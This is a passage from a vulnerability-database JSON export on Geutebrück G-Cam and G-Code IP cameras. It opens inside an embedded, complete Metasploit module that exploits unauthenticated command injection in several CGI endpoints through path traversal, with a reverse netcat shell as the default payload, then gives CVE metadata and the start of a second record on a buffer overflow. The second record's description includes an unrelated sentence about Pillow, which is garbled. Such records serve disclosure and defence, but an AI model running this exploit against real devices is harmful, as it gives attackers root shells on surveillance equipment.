\u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n    end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33553",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "id": "VAR-202109-0849",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T20:38:58.222000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158063"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33553"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.597000",
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:52.310000",
            "db": "NVD",
            "id": "CVE-2021-33553"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2083"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0600

    Vulnerability from variot - Updated: 2025-01-30 20:36

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0600",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33547"
          }
        ]
      },
